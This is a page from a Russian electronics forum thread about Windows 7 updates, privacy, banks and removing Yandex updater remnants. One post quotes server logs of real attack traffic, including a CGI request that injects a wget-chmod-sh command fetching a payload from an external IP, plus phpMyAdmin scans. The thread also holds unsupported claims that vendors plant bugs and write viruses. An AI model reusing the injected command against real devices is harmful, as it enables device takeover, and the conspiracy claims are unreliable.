Easyelectronics.ru

Электроника для всех
Текущее время: 24 янв 2019, 05:43

Часовой пояс: UTC + 5 часов

Начать новую тему Ответить на тему  [ Сообщений: 508 ]  На страницу Пред.  1 ... 16, 17, 18, 19, 20, 21  След.
Автор Сообщение
 Заголовок сообщения: Re: Вопросы по Windows 7
СообщениеДобавлено: 09 янв 2019, 15:25 
Старожил

NStorm писал(а):
Т.е. если мне скрывать нечего и я законов не нарушаю, поэтому похуй мне то, что ФНС и сбербанк видят мои бабки, то я долбоеб?
Смотри фильм "Особое мнение", там Том Круз не то что не нарушал закон, а был самим вершителем правосудия. Уже должен давно выработаться рефлекс - если тебе с улыбкой протягивают сладкую плюшку, надо тут же достать обрез и замочить урода.

СообщениеДобавлено: 09 янв 2019, 15:26 
Старожил

Кот495, а что делать? Чем другой банк в этой стране поможет? Другой банк точно также выдаст всю инфу любому гос. органу по запросу. С такими мыслями просто надо тогда уезжать из этой страны, а тут деньги не спрячешь всё-равно. Но я не пойму как цепь и обсуждаемое выше связаны. Если примут закон, заставляющий "носить в носу колокольчик", я задумаюсь о смене гражданства, а не банка. А пока меня хоть не всё, но устраивает, не вижу пока смысла для себя не пользоваться зеленым банком. Хотя равно как и навязывать его другим, мне они за это не платят. )

СообщениеДобавлено: 09 янв 2019, 15:33 
Старожил

Кот495 писал(а):
И давать их "латать" тем, кто намеренно их и создали? Нанимать лисицу строить курятник?
Уж если и закрывать уязвимости - то силами сторонних разработчиков, и чем стороннее - тем лучше, хотя не панацея конечно. Панацеи нет - алягер ком алягер.

Любой современный софт на ПК может содержать баги. Это ведь миллионы строк кода. Ни одна команда программистов в мире не напишет ОС соответствующего уровня полностью без единого бага, это невозможно пока что. Баги даже в процах стали делать, Meltdown и Spectre поищите, если не слышали.
Панацеи нет действительно. 0day уязвимости, которые еще не залатаны поэтому продают и покупают за реальные деньги. Только вот обновления помогают избегать как минимум большую часть проблем. Пока какой-нибудь ботнет расползется и доберется до вас, глядишь уже патчик стоять будет. Пока какой-нибудь 14-летний кулхацкер не возьмем в руки "букварь по старым дырам в винде" с уже готовыми скриптами (script kiddie), и не найдет вашу счастливую не обновленную систему.
Багфиксы ПО есть и будут и делает их всегда разработчик. И это вполне нормальное явление.

СообщениеДобавлено: 09 янв 2019, 15:37 
Старожил

Кстати, заметили, что программа чипования населения как-то сама собой незаметно утихла? Вот и объяснение. Люди почуяли неладное и проявили упорство, не захотели чиповаться. Тогда хозяева матрицы перенаправили усилия на ваши компьютеры, понимая, что рано или поздно вся ваша жизнь будет завязана на компьютер, и чтобы поставить вас вне закона, не надо будет требовать числа зверя на челе, а достаточно обновить вашу винду, в целях вашей же безопасности.

СообщениеДобавлено: 09 янв 2019, 15:41 
Старожил

iev91 писал(а):
Кстати, заметили, что программа чипования населения как-то сама собой незаметно утихла?

Все население давно прочиповано. Вы че не заметили? Вы когда раздельно с сотовым телефоном находитесь?
GSM/GPS позиционирование симки, купленной на ваш паспорт, с вероятностью 99.999 говорит о том где вы и что делаете. Весь маршрут вашего движения можно отследить.

Долбоебы еще и расплачиваются телефоном. Как раз реализовали идею платежки "чипом".
Там что идея воплотилась почти на 99%.

А тупая блокировка ваших счетов теж же 99% людей сделают полностью нищими. Много у вас налика дома?

СообщениеДобавлено: 09 янв 2019, 15:45 
Старожил

Мне современное общество напоминает толпу мышей, которая сама взводит мышеловку.
А когда мышеловка рубит одну мышь пополам остальные говорят, - ну это наверно дурак был, я то не такой. Давйате еще раз взведем.

Я двух дебилов знаю, которые уже несколько лет бегают от одой микрозаймовой организации до другой.
Знают что там 720% годовых. Занимают то тыщу, то две. За то регулярно. Раз в месяц стабильно.
У обоих по двое детей.

СообщениеДобавлено: 09 янв 2019, 16:01 
Старожил

NStorm писал(а):
какой-нибудь 14-летний кулхацкер не возьмем в руки "букварь по старым дырам в винде"
Это по большей части миф, такие случаи единичны в истории. Основную массу вирусов пишут те же, кто потом выпускают противоядия от них. За то и за другое собирают деньги. За одно - с одних, за второе - с других...

В любой системе возможны баги. Да. Но отработка должна заключаться в их устранении и как следствие уменьшение их количества.
А когда система всё более совершенствуется, а количество багов всё возрастает - вывод может быть только один: они вносятся намеренно.
Дальнейший логический вывод тривиален, незачем повторять.

NStorm писал(а):
Если примут закон, заставляющий "носить в носу колокольчик", я задумаюсь о смене гражданства, а не банка.
А что если тогда сделать это окажется крайне трудно? Не надо быть пророком, чтоб предположить, что власть сделает всё от нее зависящее, чтоб затруднить Вам "побег".
И у нее найдется к тому немало средств...

Так что никогда не следует никому позволять контролировать себя и свое ближайшее окружение, ни в малом, ни в большом. После может оказаться поздно.

Петлю на свою шею накинуть легко, а вот снять обратно - ...

СообщениеДобавлено: 09 янв 2019, 16:32 
Старожил

ATOM писал(а):
Если ты с ним, ты долбоеб, которого возьмут за жопу и арестуют все деньги на счете.
Надо быть в край контуженным, что бы использовать сбербанк в принципе.

ФНС и Сбер напрямую общаются. И похуй им законы о банковской тайне.

Ну и что? У меня все знакомые сидят на сбербанке. Наличные деньги только в автобусе в руки беру. Даже на рынке уже бабки деньги через сбербанк онлайн принимают.
Даже серые зарплаты до 100 тыс. точно никого не интересуют.
Банкоматы у нас на каждом углу, стандарт по сути. Никаких глюков.
На счете у меня в сумме и так минуса, кредитов больше, чем накоплений, брать нечего ))

Цитата:
По поводу всяких ебланских телеграмов.
Плюсы назвать слабо?
А в чем минусы старой аськи? Чего не хватало?

У меня все из аськи убежали, ни кто не сидит. Хотя было удобно, пользовался Miranda сборкой, она же и через jabber работала и работает. Только не востребовано.
Соседи и родители детей в школе сидят в Viber.
Подростки Вконтакте, у них свое приложение.
Программисты в Telegram сидят. Там удобно что можно самому себе слать фотки и документы, хранить и обменивать комп<->телефон. Удобный клиент на компе. Всякие роботы и сервисы, каналы интересные, из-за аномнимности.
Ватсап не востребован к счастью, и так перебор мессенджеров.

СообщениеДобавлено: 09 янв 2019, 16:50 
Старожил

NStorm писал(а):
Пока какой-нибудь 14-летний кулхацкер не возьмем в руки "букварь по старым дырам в винде" с уже готовыми скриптами (script kiddie), и не найдет вашу счастливую не обновленную систему

Как вы взломаете систему за роутером провайдера и роутером домашним? Там ни одного порта наружу не светится. И типичный юзер по https подключается к майл.ру новости посмотреть и вконтакте поболтать.

У меня есть сервер на Линуксе с белым IP, его долбят круглосуточно, бесконечные атаки, пишу данные с порта одного в файл, там бесконечно пытаются root права получить, или обратится к БД, или к ядру винды пробиться, наугад, без разбора, иногда DDOS небольшой, сотни запросов пустых за минуту. Всё на автомате, чужие ботнеты лезут. Иногда сканируют на прокси доступность.

Примеры вот, порт типа 8080, я не знаю что тут хотели от компа, к какой-то БД хотели доступ получить
Код:
2018-10-26 08:06:11,354; URL=POST / HTTP/1.1
Host: 127.0.0.1:30303
User-Agent: Go-http-client/1.1
Content-Length: 79
Accept: application/json
Content-Type: application/json
Accept-Encoding: identity
{"jsonrpc":"2.0","id":1,"method":"eth_getBlockByNumber","params":["0x0",false]}

тут какая-то жесть, есть и круче запросы на пол экрана с упоминанием системных файлов
Код:
2018-10-23 19:45:06,718; URL=GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1

здесь пытались Апач взломать с типовой конфигурацицией, Wordpress какой-нибудь
Код:
2018-10-29 07:52:57,904; IP 188.19.188.240; n=13320
2018-10-29 07:52:57,904; URL=GET /phpMyAdmin-2.2.6/ HTTP/1.1
2018-10-29 07:52:57,904; time=3053.84
2018-10-29 07:52:58,074; IP 188.19.188.240; n=13321
2018-10-29 07:52:58,084; URL=GET /phpMyAdmin-2.5.1/ HTTP/1.1
...
...

Взламывают в основном базы данных и сервисы, а не ОС. Но и ОС могут. Тот же Апач без патча ломают, все программы нужно обновлять, а еще важнее настраивать корректно.

Но у нас то речь не о публичном сервере, а домашних/офисных компах, кто там будет ломать? )) Раньше были дикие домашние сети, все друг друга видели напрямую, сейчас вроде везде управляемые сети.

СообщениеДобавлено: 09 янв 2019, 17:03 
Старожил

Вариантов много на самом деле. Понятное дело, что белых IP напрямую уже почти ни у кого не осталось из домашних пользователей. Но остаются браузерные эксплоиты (туда же всякую javascript хрень, вроде майнеров).
В домашних сетках у многих сейчас стоит вайфай роутер, пароль от которого раздается гостям, соседям и т.д. А внутри вайфай - считай "дикая домашняя сеть", всё видно. Придет гость с ноутом инфицированном, подрубится к вайфаю и вот уже и вся домашняя утварь - зомби под контролем ботнета.
Опять же есть способы достучаться и обратно до компа юзера, даже через провайдеровский роутер. NAT работает так, что чтобы приходили обратные пакеты, роутер запоминат первый исходящий пакет и комбинацию IP/портов. И пропускает соответствующие обратные входящие. Теоретически это тоже открывает широкий простор для экспоита юзерского ПО, чтобы получить доступ к портам других сервисов, если на ПК будет потенциально незащищенное ПО.
Ну про всякие сложные вещи, вроде PoisonTap я вообще молчу.
Конечно намбер уан остаются юзвери, качающие и запускающие всё подряд из инета. Тут никакой антивирус не поможет.

Последний раз редактировалось NStorm 09 янв 2019, 17:09, всего редактировалось 1 раз.

СообщениеДобавлено: 09 янв 2019, 17:44 
Старожил

Кот495 писал(а):
Это по большей части миф, такие случаи единичны в истории. Основную массу вирусов пишут те же, кто потом выпускают противоядия от них. За то и за другое собирают деньги. За одно - с одних, за второе - с других...

Вот это как раз таки тоже миф. Что "основную массу". Если говорить не о вирусах, а о всех зловредах. Просто вирусы уже давно никому не нужны. Нужны ботнеты для скрытого майнинга и ддоса. Ну и вымогальщики денег за расшифровку данных.

Цитата:
В любой системе возможны баги. Да. Но отработка должна заключаться в их устранении и как следствие уменьшение их количества.
А когда система всё более совершенствуется, а количество багов всё возрастает - вывод может быть только один: они вносятся намеренно.

Почему вы решили, что возрастает? В ушедшем году было на 14 ошибок меньше, чем в 2017 :) https://www.cvedetails.com/product/3223 ... ndor_id=26

СообщениеДобавлено: 09 янв 2019, 18:03 
Старожил

NStorm писал(а):
Не, я о тех, кто кликает по вот таким вот левым ссылкам

Ну и как отличить эту картинку от настоящей? Аргумент какой-то сомнительный. Что мешает нарисовать картинку точно такую же, как и настоящее предложение обновиться? На всех подделках всегда написано "остерегайтесь подделок", лол.
Люди вон такие купюры изготавливают, что эксперты в банке их определяют как настоящие.
Пусть попробуют блокчейн взломать, если такие умные :)

СообщениеДобавлено: 09 янв 2019, 18:18 
Старожил

Может быть вам памятно обновление KB905474 ? Ни разу не левое)))))))))

СообщениеДобавлено: 09 янв 2019, 18:44 
Старожил

Кот495 писал(а):
Может быть вам памятно обновление KB905474 ? Ни разу не левое)))))))))

Производитель коммерческого ПО борется с пиратством. Что в этом удивительного? Не крякнутая винда никак бы не ругалась при этом. В чем соб-но проблема? Юзаете пиратский софт - ну не надо сетовать на производителя, что он с этим борется.

СообщениеДобавлено: 09 янв 2019, 18:47 
Старожил

Я считаю, что он не прав. Он со мной борется, а я с ним.
Алягер ком алягер.

СообщениеДобавлено: 09 янв 2019, 20:39 
Старожил

Вот поэтому их ПО на вас и обиделось ) Ну зря вы так на самом деле. Опыт многих лет мне говорит, что обновления Windows штука нужная. И с отключенными обновлениями обычно больше проблем, чем без них.
К вашим проблемам кстати мысль еще появилась вот только недавно. А может в логах системных что-то есть? Попробуйте повторить зависание от начала до конца, запомнить время, и из под админской учетки заглянуть в "Просмотр событий" (Win+R -> eventvwr.msc). Там в журналах Windows, особенно в разделе Система посмотреть на наличие чего-то, что может привести к источнику проблемы. Там та еще помойка, куча записей, будьте готовы. Поэтому время стоит точное начала и конца висуна запомнить раньше )

СообщениеДобавлено: 09 янв 2019, 23:38 
Старожил

NStorm писал(а):
будьте готовы.
- Всегда готов! Изображение

Впрочем, кое-что интересное выловить удалось ;))
Точное время начала зависания нигде не отметилось. Но через 36 сек после начала, журнал "Система":
Служба "Защита программного обеспечения" перешла в состояние Остановлена.
Журнал "Приложение", то же время:
903 Security-SPP
Служба защиты программного обеспечения остановлена.

Конец зависания в этих журналах не отметился.

За 40сек до отвисания,
"Журналы событий и служб -> Microsoft -> Windows -> Bits-Client -> Работает":

3 события, отмеченные одним и тем же временем:
Задание BITS Yupdate-task настроено на запуск C:\Users\User\AppData\Local\Yandex\Updater\yupdate-exec.exe после передачи http://soft.export.yandex.ru/status.xml?yasoft=barie&clid=2100764-003&ui={FC961AC6-A842-49C3-AF54-B6B9A1273ED1}&ver=8.9.1.5100&os=&stat=install&brandID=yandex&lang=ru&fd=15.11.2018. Службе не удалось запустить программу, ошибка 0x800704DD; BITS будет периодически запускать программу до успешного выполнения.

Задание BITS Yupdate-task настроено на запуск C:\Users\User\AppData\Local\Yandex\Updater\yupdate-exec.exe после передачи http://soft.export.yandex.ru/status.xml?yasoft=vbie&clid=2100764-003&ui={FC961AC6-A842-49C3-AF54-B6B9A1273ED1}&ver=2.18.0.5151&os=&stat=install&brandID=yandex&lang=ru&fd=15.11.2018. Службе не удалось запустить программу, ошибка 0x800704DD; BITS будет периодически запускать программу до успешного выполнения.

Задание BITS Yupdate-task настроено на запуск C:\Users\User\AppData\Local\Yandex\Updater\yupdate-exec.exe после передачи http://soft.export.yandex.ru/status.xml?yasoft=vbie&clid=2100764-003&ui={FC961AC6-A842-49C3-AF54-B6B9A1273ED1}&ver=2.18.0.5151&os=&stat=uninstall&fd=12.05.2018. Службе не удалось запустить программу, ошибка 0x800704DD; BITS будет периодически запускать программу до успешного выполнения.

Опять этот злоебучий Яндекс!
То есть, как я понимаю, при любом сохранении чего-нибудь на диск, он заряжен отсылать данные на Яндекс?!.. - ну хороооооош... у меня нет слов. Попался бы он мне где-нить на улице - уконтрапупил бы, ззаразу, особо изуверскими способами, что бдсмщики прифигели бы.

Я ж его удалил, где только мог!.. Как добить-то?
Что такое BITS?

СообщениеДобавлено: 09 янв 2019, 23:58 
Заглядывает иногда

Кот495 писал(а):
Задание BITS Yupdate-task настроено на запуск C:\Users\User\AppData\Local\Yandex\Updater\yupdate-exec.exe

Скорее всего в планировщике задач (Task planner в администрировании) запускается. Sysinternals suite уже стоит? Там тулза autoruns есть - показывает все, что автозапускается - в том числе и из планировщика задач.

СообщениеДобавлено: 10 янв 2019, 00:08 
Старожил

NStorm писал(а):
Вот поэтому их ПО на вас и обиделось ) Ну зря вы так на самом деле. Опыт многих лет мне говорит, что обновления Windows штука нужная. И с отключенными обновлениями обычно больше проблем, чем без них.

Зачем, если система работает стабильно? Инструмент превращается в источник сюрпризов, а пользователь в бета тестера.

Еще круче с Java, там все стали бета тестрерами. Старые версии Java только по платной подписке за тысячи $. Пытался на Windows XP обновить Java (чтобы Майнкрафт запустить), официальный сайт дает скачать только под новые ОС, старые промежуточные версии есть, но только за деньги. Раньше такого не было, разработчики решили монетизировать успех. Каждые несколько месяцев движок Java обновляется, и в вашем стабильно работающем приложении могут всплывать глюки. Корпорациям выгоднее платить 2.5 $ за процессор и сидеть на старых, отлаженных версиях, давностью от полу года до n лет. Так как Java любим корпорациями, их и доят по полной программе.

Ну представьте, у вас боевой сервер, управляет реактором, пусть не атомным, а химическим. Тут бац, java update, исправлены глюки одни, и добавлены новые, ПО падает с мутной ошибкой Exception 100500 error. Пока всё починят программисты пройдет месяц. Обновления тут принципиально недопустимы. Любое обновление тестировать долго и нудно. А лучше вообще ничего не трогать.

С домашними компами проще, но тоже есть подобные моменты. Например нужно показать презентацию, а винда полезла обновляться через мобильный телефон на скорости 0.1 мегабита.

Даже обновления антивируса могут сюрпризы приносить. Неожиданно съедает исполняемый файл, например.

СообщениеДобавлено: 10 янв 2019, 01:09 
Старожил

Кот495 писал(а):

Ну там путь написан, где он стоит. Есть там exeшник этот?
Цитата:
Что такое BITS?

https://ru.wikipedia.org/wiki/Backgroun ... er_Service

СообщениеДобавлено: 10 янв 2019, 02:20 
Старожил

NStorm писал(а):
Кот495 писал(а):

Ну там путь написан, где он стоит. Есть там exeшник этот?
Нету разумеется. Этот анафемский Яндекс-Бар был штатно унинсталлирован, а после остатки были подчищены мной в ручную, и все каталоги с наименованием "Yandex" были снесены начисто.
Потому он и запустить не может. Но и не нужно! Как-то надо отменить это дело.

СообщениеДобавлено: 10 янв 2019, 10:31 
Старожил

Остатки в реестре тоже вычищены?

СообщениеДобавлено: 10 янв 2019, 10:55 
Старожил

По поиску "yandex" удалял везде, кроме разделов Internet Settings, где это слово присутствует в реальных нетовских адресах в списке поисковиков, карт, переводчиков, почты.

Поискал специально этот упдатер. В реестре такого нет. Ни имени файла, ни полного пути.

Последний раз редактировалось Кот495 10 янв 2019, 11:02, всего редактировалось 1 раз.

СообщениеДобавлено: 10 янв 2019, 10:59 
Старожил

sim писал(а):
Пытался на Windows XP обновить Java

Недавно на XP обновил "вручную" - скачал портабельную и скопировал с заменой в папку где была версия JRE 1.7, MplaX 5.10 нормально заработал.
https://portableapps.com/apps/utilities/java_portable

СообщениеДобавлено: 10 янв 2019, 11:04 
Старожил

Вот это вот - нормальное обновление - когда Вы это делаете потому что Вам нужно, и Вы знаете: что именно Вам нужно, почему и зачем.

Начать новую тему Ответить на тему  [ Сообщений: 508 ]  На страницу Пред.  1 ... 16, 17, 18, 19, 20, 21  След.

Часовой пояс: UTC + 5 часов